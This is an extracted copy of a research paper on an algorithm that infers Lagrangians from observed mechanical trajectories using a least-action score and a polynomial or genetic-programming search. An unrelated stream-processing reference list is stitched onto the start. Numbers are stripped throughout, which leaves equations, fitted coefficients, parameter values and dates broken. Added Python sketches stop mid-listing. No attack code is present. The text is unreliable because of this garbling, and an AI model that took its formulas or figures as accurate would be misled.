zdonik s. . staying fit: efficient load shedding techniques for distributed stream processing. in: proceedings of the rd international conference on very large data bases, september – , university of vienna, austria, – . toshniwal a, taneja s, shukla a, ramasamy k, patel jm, kulkarni s, jackson j, gade k, fu m, donham j, bhagat n, mittal s, ryaboy d. . storm@twitter. in: international conference on management of data (sigmod), snowbird, ut, usa. new york: acm, – . vavilapalli vk, murthy ac, douglas c, agarwal s, konar m, evans r, graves t, lowe j, shah h, seth s, saha b, curino c, o’malley o, radia s, reed b, baldeschwieler e. . apache hadoop yarn: yet another resource negotiator. in: proceedings of the th annual symposium on cloud computing. santa clara, ca, usa. acm, . xu j, chen z, tang j, su s. . t-storm: traffic-aware online scheduling in storm. in: th international conference on distributed computing systems (icdcs), madrid, spain. washington, d.c.: ieee, – . xu l, peng b, gupta i. . stela: enabling stream processing systems to scale-in and scale-out on-demand. in: international conference on cloud engineering (ic e), berlin, germany. pisacataway: ieee. zaharia m, chowdhury m, franklin mj, shenker s, stoica i. . 
spark: cluster computing with working sets. in: hotcloud, boston, ma, usa, vol. , – .
an algorithm for discovering lagrangians automatically from data submitted august accepted october published november corresponding author jonathan j.
hudson, jony.hudson@imperial.ac.uk academic editor jingbo wang additional information and declarations can be found on page doi . /peerj-cs. copyright hills et al. distributed under creative commons cc-by . open access an algorithm for discovering lagrangians automatically from data daniel j.a. hills, adrian m. grütter and jonathan j. hudson department of physics, imperial college of science, technology and medicine, london, united kingdom abstract an activity fundamental to science is building mathematical models. these models are used to both predict the results of future experiments and gain insight into the structure of the system under study. we present an algorithm that automates the model building process in a scientifically principled way. the algorithm can take ob- served trajectories from a wide variety of mechanical systems and, without any other prior knowledge or tuning of parameters, predict the future evolution of the system. it does this by applying the principle of least action and searching for the simplest lagrangian that describes the system’s behaviour. by generating this lagrangian in a human interpretable form, it can also provide insight into the workings of the system. subjects artificial intelligence, data mining and machine learning, scientific computing and simulation keywords lagrangian, physics, least-action, discovery introduction modern science is, in many senses, highly automated. experiments are frequently run under computer control, with data often recorded by the computer directly. computerised data analysis and visualisation are widely used to process the resulting large volumes of data. indeed, the ability to collect and analyse massive data sets is opening up an entirely new measure-first-ask-questions-later approach to science: the square kilometer array radio telescope is expected to collect approximately one exabyte of data per day (newman & tseng, ); over collisions from the atlas detector were analysed in the search for the higgs boson (atlas collaboration, ); and state-of-the-art whole-genome sequencers can currently sequence gigabases per day (hayden, ). in each of these examples the scientific questions are not fully formulated in advance of taking the data, and the question of how to best extract knowledge from the dataset is of great interest. this motivates the study of how to scale up the processes of scientific reasoning to take advantage of the wealth of available data. thus far, scientific reasoning has largely resisted automation. hypothesising and refining models is still on the whole carried out by humans, with little direct support from computers. it has long been a desire of artificial intelligence researchers to automate this part of science, and with the growing volume of data available from experiments the motivation for this desire comes ever more sharply into focus. in this paper we present a step in this direction: an algorithm that automates finding a mathematical model for a system, in a scientifically principled way, by examining only its observed behaviour. how to cite this article hills et al. ( ), an algorithm for discovering lagrangians automatically from data. peerj comput. sci. :e ; doi . /peerj-cs. mailto:jony.hudson@imperial.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . 
/ https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. early attempts to automatically model physical systems searched for simple math- ematical regularities in observed quantities. langley’s ( ) bacon system was able to re-discover many simple laws—the ideal gas law, ohm’s law, coulomb’s law and others—from experimental data. dzeroski & todorovski ( ) went beyond simple static laws with their lagrange system which was able to search for differential equations that governed observed time series. they extended this work to the lagramge system which additionally allowed an expert user to provide domain knowledge, improving the quality of the results (todorovski & dzeroski, ). the pret system, developed by bradley and collaborators ( ), brings to bear a variety of advanced ai techniques on the problem of identifying system differential equations. it has a sophisticated method for representing qualitative observations, and allows expert-user domain knowledge to be combined with automatic search very effectively. schmidt & lipson ( ) used a genetic programming approach to automatically evolve invariant mathematical expressions from observed data. note that schmidt and lipson originally claim that their technique is capable of discovering lagrangians, but it has been shown that this is false except for lagrangians of a very particular, trivial form (hillar & sommer, ). schmidt & lipson ( ) do not include their claim in a subsequent paper on the same work. in the context of engineering, there is a significant body of work on ‘system identification’, with techniques ranging from very general ad hoc fitting methods to fitting detailed physical models representing important classes of system (sjberg et al., ; ljung, ). in this work we take a different approach than those described above, the essence of which is that we embed a simple, general physical principle—the principle of least action—and very little else into our algorithm. while we are embedding the domain knowledge of a physicist in our algorithm, we are not embedding information about any particular physical system or class thereof. rather we are capturing a deep understanding that has been distilled by physicists over the past years, and packaging it into an algorithm that can be applied by non-experts. we find the algorithm to be surprisingly powerful, given its simplicity, but this power comes not from the ingenuity of its construction, rather from the broad applicability of the physical principle embedded in it. the principle of least action the principle of least action is one of the most fundamental and most celebrated principles in physics. first proposed by maupertuis ( ) and euler ( ) it states that the problem of predicting the behaviour of many physical systems can be cast as finding the behaviour that minimises the expenditure given by some cost function. the total expenditure of the system is known as the action. it is a remarkable fact that the behaviour of a very wide range of physical systems—including those studied in classical mechanics, special and general relativity, quantum field theory, and optics—can all have their behaviour explained in terms of minimising a cost function. each physical system has its own cost function, and once this function is known it is possible to predict exactly what the system will do in the future. the exercise of determining the cost function—often known as lagrange’s function, or just the lagrangian—for a particular physical system is central to physics. 
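the principle can be illustrated numerically: for a simple system whose lagrangian is known, the action evaluated along the true trajectory is smaller than along slightly perturbed trajectories sharing the same endpoints. the short sketch below does this for a unit-mass, unit-frequency harmonic oscillator; it is purely illustrative and is not part of the algorithm described next.

```python
# illustrative only: the true trajectory of a harmonic oscillator minimises the
# action integral of its lagrangian relative to nearby perturbed trajectories.
import numpy as np

t = np.linspace(0.0, np.pi / 2, 1000)      # quarter period, so the path is a true minimum
x_true = np.cos(t)                         # solution of x'' = -x with x(0)=1, v(0)=0

def action(x, t):
    v = np.gradient(x, t)
    lagrangian = 0.5 * v**2 - 0.5 * x**2   # kinetic minus potential energy
    return float(np.sum(lagrangian) * (t[1] - t[0]))

for eps in [0.0, 0.05, 0.1]:
    # the perturbation vanishes at both endpoints, so all paths share the boundary values
    x = x_true + eps * np.sin(2 * t) * np.sin(np.pi * t / t[-1])
    print(eps, action(x, t))               # the action is smallest for eps = 0
```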
feynman described this process well (feynman, leighton & sands, ) as "some kind of trial and error", advising students that "you just have to fiddle around with the equations that you know and see if you can get them into the form of the principle of least action." in this paper we present an algorithm that does this "fiddling" automatically, without requiring the user to have any expertise in physics.

the lagrangian is well-suited to be the output of an automated modelling algorithm. it has the desirable property that it is a single, scalar expression that contains everything necessary to predict the system's future evolution. consider, in contrast, finding the hamiltonian, where it would also be necessary to find the corresponding conjugate momenta. the lagrangian has the additional quality that it is coordinate-independent and as a result can be written in any coordinate system. this is useful in the case of an automated algorithm where it is not obvious in which coordinate system the data might be presented. however, it should be noted that not all physical systems can be described by a lagrangian. in particular, dissipative systems cannot be modelled this way. nevertheless, many interesting processes do admit a lagrangian formulation, and what's more, as the algorithm is automatic little is lost by speculatively applying it to a system's trajectory. we might imagine a future where an ensemble of algorithms such as this one try to find an appropriate model for a system, based on a variety of physical principles and insights. we present this algorithm as a step towards such a future system. the problem of taking a lagrangian and automatically calculating the resulting motion of the system has been widely studied and applied. to the best of our knowledge, this work is the first that solves the inverse problem of taking the observed motion and calculating the lagrangian for non-trivial systems.

the algorithm
to find a model for a system we search over a space of possible lagrangians. to do this we need three elements: an objective to guide the search, which will take the form of a score function; a representation of the possible lagrangians; and an algorithm to execute the search over the possible lagrangians, working to improve the score. we will first describe the score function, which is the central idea of the algorithm.

score function
the objective of our algorithm is to find a lagrangian that, when integrated along the system's observed trajectory, yields a smaller total (action) than when integrated along any neighbouring trajectory. it would be possible to implement this definition of the least action principle directly in an algorithm, but instead we take an indirect approach that is more computationally efficient. for a lagrangian $L(\theta,\phi,\ldots,\dot\theta,\dot\phi,\ldots)$ and a trajectory $(\theta(t),\phi(t),\ldots,\dot\theta(t),\dot\phi(t),\ldots)$ it is possible to write down a condition, in the form of a set of differential equations, that must be satisfied if the action is to be stationary along the trajectory. these differential equations are known as the euler–lagrange equations,

$$\frac{d}{dt}\frac{\partial L}{\partial \dot q} - \frac{\partial L}{\partial q} = 0, \quad \text{where } q \in \{\theta,\phi,\ldots\}.$$

it is to be understood that the partial derivatives are taken symbolically with respect to the coordinates and velocities, which are then replaced with the time-dependent functions from the trajectory before the time-derivative is taken. we
can define a score function based on these conditions,

$$EL(L) = \int \sum_{q\in\{\theta,\phi,\ldots\}} \left(\frac{d}{dt}\frac{\partial L}{\partial \dot q} - \frac{\partial L}{\partial q}\right)^{2} dt, \qquad (1)$$

which is zero if the euler–lagrange equations are exactly satisfied. we note that hillar and sommer first proposed using a (different) score function derived from the euler–lagrange equations in hillar & sommer ( ), but did not apply it to finding lagrangians from data.

in practice our observations of the system are not functions $(\theta(t),\phi(t),\ldots,\dot\theta(t),\dot\phi(t),\ldots)$ but discretely sampled time-series of the coordinates and generalized velocities. the algorithm operates with a dataset which is a time-series of samples $D = ((\theta(0),\phi(0),\ldots,\dot\theta(0),\dot\phi(0),\ldots),\ldots)$, where time runs from $t = 0\ldots N$. the velocity samples may be either directly measured or derived from measured coordinate data. we divide this time-series into two portions: a training set, comprising samples $0\ldots M$, and a validation set of samples $M+1\ldots N$. the algorithm will conduct its search using only the training set, reserving the validation set for out-of-sample measurement of the prediction error. in this way we can truly test the algorithm's ability to predict the future dynamics of the system. in all of the examples in this paper the sampling times will be evenly spaced, but this is not a requirement. we can discretize the euler–lagrange score function (eq. (1)) to work with these sampled datasets, giving

$$EL_{D}(L) = \sum_{t=0}^{M} \sum_{q\in\{\theta,\phi,\ldots\}} \left(\left[\frac{d}{dt}\frac{\partial L}{\partial \dot q}\right]_{t} - \left[\frac{\partial L}{\partial q}\right]_{t}\right)^{2}, \qquad (2)$$

where the subscript on the score indicates that it is taken with respect to the dataset $D$. the square-bracketed quantities in this expression are time-series, and the subscript indicates taking the element in this time-series at the given time. so, for instance, the first term in (2) is to be calculated, in principle, by: first differentiating the candidate lagrangian $L$ symbolically with respect to the appropriate generalized velocity; evaluating this quantity at every time-step in the dataset to yield a new time-series; taking the discrete derivative of this new time-series with respect to time; and finally finding the element at time $t$ in this time-derivative time-series. in practice, as we shall see below, a more computationally efficient implementation may be used.

the function $EL_{D}$ is the basis of the score function, capturing the principle of least action, but it is not sufficient on its own. while it is true that the lagrangian we seek minimises $EL_{D}$, the converse is not true, as there are other functions which minimise $EL_{D}$ but are not physically meaningful lagrangians. the first class of functions that we wish to avoid are those which are numerically tiny, for instance a lagrangian of the form $L = c\,\theta$ with $c$ a vanishingly small constant.
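to make the discretised score concrete, the following is a minimal sketch of how eq. (2) could be evaluated for a candidate lagrangian held as a symbolic expression. it is an illustration only, not the authors' implementation (their code is linked later in the text), and the function and variable names are ours.

```python
# illustrative sketch only: evaluate the discretised euler-lagrange score (eq. 2)
# for a candidate lagrangian given a uniformly sampled trajectory.
import numpy as np
import sympy as sp

def el_terms(L, q, qdot, data, dt):
    """return the two time-series [d/dt dL/dqdot]_t and [dL/dq]_t for one coordinate.
    data maps each sympy symbol to a 1-d numpy array of samples; dt is the spacing."""
    args = sorted(data.keys(), key=str)
    samples = [data[s] for s in args]
    n = len(samples[0])
    # symbolic partial derivatives, evaluated at every time-step of the dataset
    p = sp.lambdify(args, sp.diff(L, qdot), "numpy")(*samples) * np.ones(n)
    f = sp.lambdify(args, sp.diff(L, q), "numpy")(*samples) * np.ones(n)
    return np.gradient(p, dt), f          # discrete d/dt of dL/dqdot, and dL/dq

def el_score(L, coords, vels, data, dt):
    """discretised euler-lagrange score, summed over coordinates and over the samples
    supplied (i.e., the training portion of the series)."""
    return sum(np.sum((a - b) ** 2)
               for q, qd in zip(coords, vels)
               for a, b in [el_terms(L, q, qd, data, dt)])
```

for a single pendulum-like coordinate, data would hold sampled arrays for both the angle and its velocity; the same helper also supplies the ingredients for the normalisation score introduced next.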
there is a second, more interesting class, of unwanted expressions that minimise the euler–lagrange score eld. consider, for instance, the candidate lagrangian l = θ nθ̇ . this lagrangian satisfies the euler–lagrange equations trivially, in a way that does not depend on the trajectory. such path-independent least-action lagrangians are interesting from a physics point-of-view, being closely related to gauge invariance, but here they are a nuisance. to guide the search away from these expressions we introduce a second ‘control’ trajectory, c. this trajectory is unrelated to the behaviour of the system under study and serves solely to eliminate path-independent lagrangians. we reason that the lagrangian that we are seeking will score well with eld but should score poorly on elc, which is the euler–lagrange score evaluated along the control trajectory. the exact form of the control trajectory is unimportant so long as it not a valid trajectory of the system under study. in this work we use a control trajectory which is uniform motion in each coordinate, with velocity arbitrarily chosen to be . , for all experiments. we combine the three parts described above to give the search score function, s(l) = u (nd(l))u (elc(l)) eld(l) + ϵ elc(l) + ϵ , ( ) where u(x) = ln(x + ϵ) + is a function that is minimised, with value approximately one, when the argument is one. the small constant ϵ, typically set to be − , ensures that the score function has the desired asymptotic behaviour for small values of the numerator and denominator, even when faced with errors from finite precision machine numbers. the factor u (elc(l)) prevents the search algorithm from driving towards lagrangians that perform badly on the real dataset, but even worse on the control data. overall, the score function drives the search to find lagrangians that simultaneously minimise the action along the observed trajectory while having a non-zero action along the control trajectory, and a normalisation score close to one. we note that the way that the score function is assembled is somewhat ad hoc. its purpose is to guide the search to the correct answer while avoiding pathologies, and there are a number of ways this could be done—indeed, many were tried during development. this score function is simply presented as a particular arrangement that we have demonstrated to work. note that the score function, s, does not in any way consider whether the prediction of the candidate lagrangian agrees with the training data. it only considers whether the trajectory satisfies a least action principle for the candidate lagrangian. the fact that this, hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. on the face of it unrelated, objective leads to successful predictions is the insight from physics that we have embedded in our algorithm. representation and search we have experimented with two representations of candidate lagrangians. the first, a restricted polynomial representation, allows a fast search algorithm to be implemented. it is limited in the lagrangians it can represent exactly, although through taylor’s theorem it can find approximations to any lagrangian. this representation was used to generate the bulk of the results in this paper, and we describe it in detail in this section. the second representation lifts some of the constraints of the restricted polynomial model, at the expense of vastly increased computational cost. we describe it in ‘generalisation’. 
the restricted polynomial representation assumes that the lagrangian can be represented by a polynomial in the coordinates and velocities. the model is a sum of monomial terms, parameterised by coefficients multiplying every term. we restrict this polynomial in two ways: we limit the maximum power of any coordinate or velocity to be m; and we limit the maximum degree of any combination of coordinates and velocities to p. in addition, we remove any terms from the model that can have no physical significance, that is terms that are constant or of the form qnq̇. these terms simply “fall through” the euler–lagrange equation without changing the resulting equations of motion, so there is no value in including them in the search. for example, for one variable θ with m = and p = the resulting model would be c θ̇ + c θ̇ + c θ + c θ θ̇ + c θ θ̇ + c θ + c θ θ̇ + c θ . for a given restricted polynomial model the score function is minimised by adjusting the parameters ci. we conduct this optimisation using the nelder–mead simplex algorithm (nelder & mead, ) using the modified parameters of gao & han ( ) which improve the efficiency in high dimensions. the coefficients are bounded between − and , enforced by a penalty function. we use a tight convergence tolerance, usually one part in , to encourage the search to break out of local minima. we impose a maximum iteration limit, usually × , on the search to ensure that it is bounded in time. we do not know in advance what values of m and p are needed to accurately represent the lagrangian of the system under study. what’s more, we wish to find the simplest lagrangian such that the trajectory satisfies the principle of least action. we approach this using a simple heuristic algorithm. we start with the smallest non-trivial model (m = ,p = ) and optimise the parameters with the simplex search. we then make an in-sample prediction of how well the optimised lagrangian predicts the dynamics of the system in the training sample. this is done by generating equations of motion from the optimised lagrangian and numerically solving them, using initial conditions derived from the first sample in the dataset. if this in-sample prediction fits better than a specified tolerance then we stop and return the lagrangian. if it does not fit then we generate a larger model (i.e., with larger values of m and/or p) and try again. the models are stepped through in increasing number of monomial terms. this proceeds until either a model hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure sketches of the five test systems that we consider. is found that fits or a maximum bound on model complexity is reached. this heuristic algorithm only crudely captures the notion of mathematical complexity of the model, but it seems to work adequately well. note that, for a given polynomial model, it is possible to partially pre-calculate the score function eld for a given dataset, yielding a function quadratic in the coefficients ci. this is possible because the form of the model is fixed and it is possible to calculate its derivatives in advance. as a result, after the initial simplification of the score function, optimisation iterations are fast, and have a run-time independent of the number of data points. code for the score function, search algorithms and the datasets we use below can be downloaded from hudson, hills & grütter (a). results we will consider five test systems, illustrated in fig. . 
the first is the unforced duffing oscillator, a textbook non-linear system. the second, a simple pendulum, is interesting because its lagrangian cannot be represented exactly in the restricted polynomial representation. the third system, two masses on a frictionless surface joined by three springs to each other and two immovable walls, has two coupled degrees of freedom. the fourth system is the double pendulum, a coupled, two degree-of-freedom non-linear system capable of chaotic motion. as with the simple pendulum, the double pendulum cannot have its lagrangian represented exactly by a finite degree polynomial. the fifth and final system is the penning-type ion-trap, a three degree-of-freedom system with magnetic and electrostatic forces, that is of considerable experimental relevance. figure shows the result of applying the algorithm to simulated data sets for these systems. it can be seen that the algorithm is able to successfully predict the future dynamics of all of the test systems. let us look in detail at the progress of the algorithm, and the resulting learned models, for two of the example systems. in the case of the duffing oscillator the algorithm tried seven, increasingly complex, polynomial models to arrive at the prediction shown, which was generated by the model with m = and p = . the final model has free parameters, and required , nelder–mead iterations to optimise. the complete search working through all seven models, with a single-threaded implementation, executes in under five seconds on a . ghz intel core i - u powered macbook air. the optimised lagrangian, where we have removed terms with coefficients less than − and displayed the remaining hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure result of running the algorithm on simulated data from the five test systems. in each graph panel, the (blue) open circles to the left of the vertical bar are the training data. the solid (red) line, to the right of the vertical bar is the algorithm’s prediction. the (red) filled circles to the right of the bar show the actual behaviour of the system. for clarity only every third validation point is shown. the algorithm does not have access to these validation points when it is making its prediction. it can be seen that the algorithm has accurately learned the dynamics of the system in each case. coefficients to two decimal places for clarity, was l = − . x + . x + . ẋ . this is exactly the expression, apart perhaps from overall scaling, that would be written by a human physicist. the coefficients yielded by the search are found to match the correct hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure application of the algorithm to data with simulated noise added. the graphs are in the same format as fig. . we see that the algorithm is robust to noise, finding a model that accurately predicts the future evolution. coefficients to the th decimal place, limited by the convergence tolerance that we set. by generating a model in this form the algorithm gives insight into the system directly from the data. the case of the simple pendulum is also interesting to consider. here the search algorithm tried three models, where the third, with m = and p = , converged in nelder–mead iterations. the search in this case took around . s. the generated model, multiplied by to make it more readable, was l = . x + . x − . ẋ − . xẋ − . x ẋ . 
it can be noted that this is not a straightforward taylor expansion of the simple pendulum's lagrangian, and it is not obvious how to relate it to the standard form. experimenting with removing terms and solving the resultant equations of motion indicates that the terms proportional to x and xẋ are unimportant, but the relatively small term in x ẋ is essential. despite being in an unexpected form, this lagrangian does make successful predictions. we shall see in 'generalisation' that it is in fact a local approximation of a true lagrangian around the region of configuration space that the training trajectory explored.

real world measurements are inevitably noisy and so to be practically useful it is important that the algorithm is able to converge even in the presence of imperfections in the data. we took the data for our third test system (the coupled harmonic oscillators) and added normally distributed noise, with standard deviation . (about % of the oscillation amplitude) to the position, velocity, and acceleration. figure shows the result of running the algorithm on this noisy data set. we see that the algorithm is robust to this noise, finding a model that describes the future evolution well.
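the perturbation used for this robustness test amounts to adding independent gaussian noise to every observed channel before re-running the identical search; a minimal sketch, with the noise level and seed as placeholders rather than the values used above:

```python
# illustrative sketch only: perturb every sampled channel (positions, velocities and,
# where used, accelerations) of a dataset with gaussian noise before searching.
import numpy as np

def add_noise(data, sigma=0.05, seed=0):
    rng = np.random.default_rng(seed)
    return {sym: series + rng.normal(0.0, sigma, size=series.shape)
            for sym, series in data.items()}
```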
we have seen in the case of the duffing oscillator that the discovered model is indeed the correct model, and we would expect that this model will correctly predict the dynamics of the system for any initial conditions. we test this by simulating the behaviour of the system for a wide range of initial conditions, and comparing the results to the predictions of the model. we find, as expected, that the learned model for the duffing oscillator does make correct predictions for all initial conditions. applying this procedure to the other test systems we find that the coupled harmonic oscillators and the penning-type ion trap models also generalise well, making successful predictions for all initial conditions. this indicates that our algorithm is not merely a hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure predictions for different initial conditions of the learned simple pendulum model (red dashed line) compared to the true behaviour (blue solid line). the amplitude of the pendulum swing varies between panels. the model was trained at the amplitude shown in (f). we see that the model makes good predictions for the initial conditions it was trained on, but breaks down for other initial conditions. sophisticated curve fitting routine, but rather is finding the underlying physical truth behind the system dynamics to make its predictions. the pendulum and double pendulum models do not generalise well, as we might have anticipated from the form of the lagrangian in eq. ( ). figure compares the prediction of the learned simple pendulum model against the true behaviour, for a variety of swing amplitudes. we see that while the prediction is accurate for the amplitude at which the model was trained, it deviates at other amplitudes. these results are perhaps to be expected, and could well be the same as generated by a human physicist given the same data. the algorithm has found a mathematically simple approximation that works well for the data it has available to it, but does not have enough to go on to determine the true underlying model. we consider two approaches to generating models that generalise better for these systems, inspired by the approaches a human physicist might take. the first method is simply to train the models with more data, corresponding to a wider range of initial conditions. the second is to introduce new mathematical constructs which allow a simpler model to be found, reasoning that this model is more likely to generalise well. for the first approach we follow exactly the same procedure as before except we generate a number of trajectories, corresponding to a range of initial conditions, and use a score that is the sum of the scores for the individual trajectories. we applied this procedure to the simple pendulum system. the resulting search takes approximately times longer to converge than the single-trajectory search. we find that the algorithm is unable to converge on an m = , p = model, as it did before, and has to continue its search until it finds an m = , p = model whose predictions fit all of the trajectories adequately. figure compares the predictive ability of this model with the ‘single-trajectory’ model of the previous section. we see that, as shown in fig. , the single-trajectory model makes hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
figure comparing a model for the simple pendulum trained on multiple trajectories with one trained on a single trajectory. the curves show the squared error between the model’s prediction and the true behaviour, as a function of the pendulum’s swing amplitude. the dashed (blue) curve shows the result for a model trained at a single swing amplitude, indicated by the heavy (blue) arrow. this model performs well at the amplitude it was trained at, but poorly at other amplitudes. the model corresponding to the solid (red) curve was trained with multiple trajectories, indicated by the other (red) arrows. the original trajectory was also included in the training set for this model. we see that the ‘multi-trajectory’ model makes better predictions across a wide range of initial conditions, including conditions that it was not trained on. the multi-trajectory model is able to make successful predictions up to surprisingly large amplitudes, well beyond those it has seen in training. good predictions for the initial condition it was trained at, but makes poor predictions for other initial conditions. the ‘multi-trajectory’ model, though, is much improved. it makes good predictions at all of the initial conditions it was trained at, and further makes good predictions at other, unseen initial conditions as well. we have found similar results for the double-pendulum system, although the computational expense of the problem constrained the experiment to a limited region of initial-condition-space. our second approach to generalisation is to expand the representation of the lagrangians to encompass a wider range of mathematical expressions. we reason that, with a wider palette of mathematics at its disposal, the algorithm may be able to find a model of simpler form that works well. history has shown, although this may be tautological, that often systems of interest to physicists can be described by remarkably simple mathematical models. we hope that by allowing the algorithm to generate structurally simpler models, it may be more likely to discover the underlying physical truth. we have developed a proof-of-principle implementation of a richer representation, and a corresponding search algorithm, detailed in the appendix . briefly, we take a genetic programming approach (koza, ) and compose mathematical expressions as trees with leaf-nodes corresponding to the system variables, simple functions (sine, cosine, square) of these variables, and numerical constants. branch-nodes of the tree are arithmetic operators +,−,×. this structure can represent a much wider range of mathematical forms than our polynomial representation. we search over this tree-structured representation using hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. an algorithm (zitzler, laumanns & thiele, ) that simultaneously tries to optimise the score and minimise the size of the trees. thus, this search algorithm tries explicitly to find simple expressions that score well on the data. repeating the search on large-amplitude (± . π ) simple pendulum data using the tree-based representation highlights the relative strength of this approach. the generated model, which makes a successful prediction, is l = . θ̇ + . cos(θ ), the same as would be written by a human physicist. naturally, this model makes correct predictions over the full range of initial conditions. there are two reasons that the tree-based expression search is able to converge on this model. 
first it is only because the representation of possible models is richer that this model can be directly represented at all. second, the notion of mathematical complexity in this representation more closely models that of a human physicist. this allows the search algorithm to do more work driving the result towards an expression that we recognize as canonical. it must be cautioned, though, that this is only a proof-of-principle demonstration. to reach this result we had to bias the search algorithm, as described in the appendix , and even then the run time is significantly longer, often taking many hours with a multi-threaded implementation on the hardware described above. we were not able to get results for the double pendulum system at all with the computing resources at our disposal. nonetheless, we present this result as the technique shows potential for learning models that are both better able to generalise, and in a format more suitable for communication to human physicists. conclusion we have demonstrated an algorithm that can predict the future dynamics of a physical system directly from observed data. we have shown that the algorithm generates models that can be communicated to a human physicist, sometimes even finding models in textbook form. we have further shown that the models generated generalise well to unseen data, and are not merely fits or interpolations, but are truly capturing the physical essence of the system under study. one might ask what the use of such an algorithm is. as a first point, we find the question of whether a computer can do science to be fascinating in itself. investigating the limits of a computer’s ability in this regard educates us as to the strengths and weaknesses of our current scientific processes, and invites us to consider a different perspective on our scientific work. but perhaps a more practical answer is that tools such as this could assist humans in their work. we see this assistance as coming in two forms. the first is simply automating the actions of a scientist so they can be applied to more data. techniques that can be automatically applied to datasets, scanning for scientifically interesting features—in the case of the algorithm in this paper, for example, finding that there is a least action principle at work—may come to be a fruitful approach to generating unexpected scientific leads as we head into a data-dominated era. the second is opening up the techniques of science to hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure an expression tree representing θ − cos(θ̇ ). non-specialists. by capturing the idea of searching for least action models in an algorithm we make it available to anyone, including those without the necessary skills to do it by hand. by way of analogy, it is interesting to consider popular online natural language translation software. while no-one would consider these tools suitable for translating poetry, they nonetheless are exceedingly useful to many people in the common case where a ‘good-enough’ translation will do. while we do not imagine computers will replace expert human physicists in the near term, we envisage the availability of tools to automate scientific reasoning will empower non-specialists to take better advantage of the discoveries and insights of physics. acknowledgements we acknowledge many useful discussions with jeremy mabbitt, mike tarbutt, jack devlin, iain barr, ben sauer, and ed hinds. 
djah and amg contributed equally to this work. appendix: tree-based representation and search here we describe in detail the tree-structured symbolic representation of mathematical expressions and the corresponding search routine. the expressions are built following a grammar designed to bias the search towards expressions that might be lagrangians for simple physical systems. each terminal of these expression trees is one of: numerical constants, randomly generated; the coordinate variables and velocities; the squares of the coordinates and velocities; and, for coordinates which represent angles, the sine and cosine of the coordinates and velocities. the non-terminal nodes of the trees are the operators +, −, ×. an example expression tree is shown in the figure, representing the expression θ − cos(θ̇). to search through these tree-structured expressions we take a genetic programming approach (koza, ), explicitly optimising both the least-action score of eq. ( ) and also a complexity score, using the spea multi-objective optimisation algorithm (zitzler, laumanns & thiele, ). this biologically-inspired evolutionary algorithm maintains a population of candidate expressions and breeds, reproduces, and mutates them to try to simultaneously optimise the least-action and complexity scores. in detail, we first construct a population of randomly generated expressions. we score these expressions using the least-action score and also assign a complexity score, which is simply the number of nodes in the expression tree. the spea algorithm takes the current population, and an initially empty set of elite expressions representing the best that have been seen so far. it has a rather complex selection mechanism (zitzler, laumanns & thiele, ) that produces a new set of elite expressions, plus a set of expressions, the breeding pool, which are candidates for reproduction. a new generation is created from the breeding pool by mutation and pair-wise crossover. mutation is effected by replacing a randomly chosen subtree of the given expression with a randomly generated subtree. the crossover operation takes two expressions, selects a random point in each of the two trees, and swaps the sub-trees at these points to generate two new expressions. the evolutionary process is repeated starting from this new generation, and we iterate for a large number of generations, typically many thousands. to improve the convergence speed of the numeric constants in the expressions we also incorporate a small amount of hill-descent into each evolutionary iteration: a subset of the expressions have their numeric constants randomly adjusted by a small amount, and if this improves their least-action score, the modification is kept. we also impose a maximum expression size (in nodes) and trim expressions that exceed it each generation to ensure that the run-time is bounded. the final elite set is a set of expressions that represents the trade-off between least-action score and complexity. we select from this set the simplest expression that has a least-action error below a specified threshold. in this tree-based method, the structure of the candidate lagrangians varies during the search, so it is not possible to partially pre-calculate the score function, as it was in the restricted polynomial technique. rather it must be calculated in full for each expression in the population.
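the authors' own implementation is the flow project code linked in the data availability section; the following is an independent, minimal python sketch of the representation and genetic operators just described. the names (random_tree, mutate, crossover) and the choice of nested lists as the tree structure are illustrative assumptions, not the paper's code, and the least-action scoring of eq. ( ) is omitted.

```python
import math
import random

TERMINALS = ["theta", "theta_dot",
             "sin(theta)", "cos(theta)", "sq(theta)",
             "sin(theta_dot)", "cos(theta_dot)", "sq(theta_dot)"]
OPERATORS = ["+", "-", "*"]
ENV = {"sin": math.sin, "cos": math.cos, "sq": lambda v: v * v}

def random_tree(depth=3):
    """grow a random expression tree as nested lists [op, left, right];
    leaves are named terminals or random numerical constants."""
    if depth == 0 or random.random() < 0.3:
        return random.choice(TERMINALS) if random.random() < 0.7 \
            else round(random.uniform(-10.0, 10.0), 2)
    return [random.choice(OPERATORS),
            random_tree(depth - 1), random_tree(depth - 1)]

def size(tree):
    """complexity score used by the multi-objective search: node count."""
    return 1 if not isinstance(tree, list) else 1 + size(tree[1]) + size(tree[2])

def evaluate(tree, theta, theta_dot):
    """evaluate an expression at one phase-space point."""
    if isinstance(tree, (int, float)):
        return tree
    if isinstance(tree, str):
        return eval(tree, {"__builtins__": {}},
                    dict(ENV, theta=theta, theta_dot=theta_dot))
    op, left, right = tree
    a, b = evaluate(left, theta, theta_dot), evaluate(right, theta, theta_dot)
    return a + b if op == "+" else (a - b if op == "-" else a * b)

def paths(tree, prefix=()):
    """index paths to every node; used to pick mutation/crossover points."""
    if not isinstance(tree, list):
        return [prefix]
    return [prefix] + paths(tree[1], prefix + (1,)) + paths(tree[2], prefix + (2,))

def replace_at(tree, path, subtree):
    """return a copy of tree with the node at path replaced by subtree."""
    if not path:
        return subtree
    new = list(tree)
    new[path[0]] = replace_at(tree[path[0]], path[1:], subtree)
    return new

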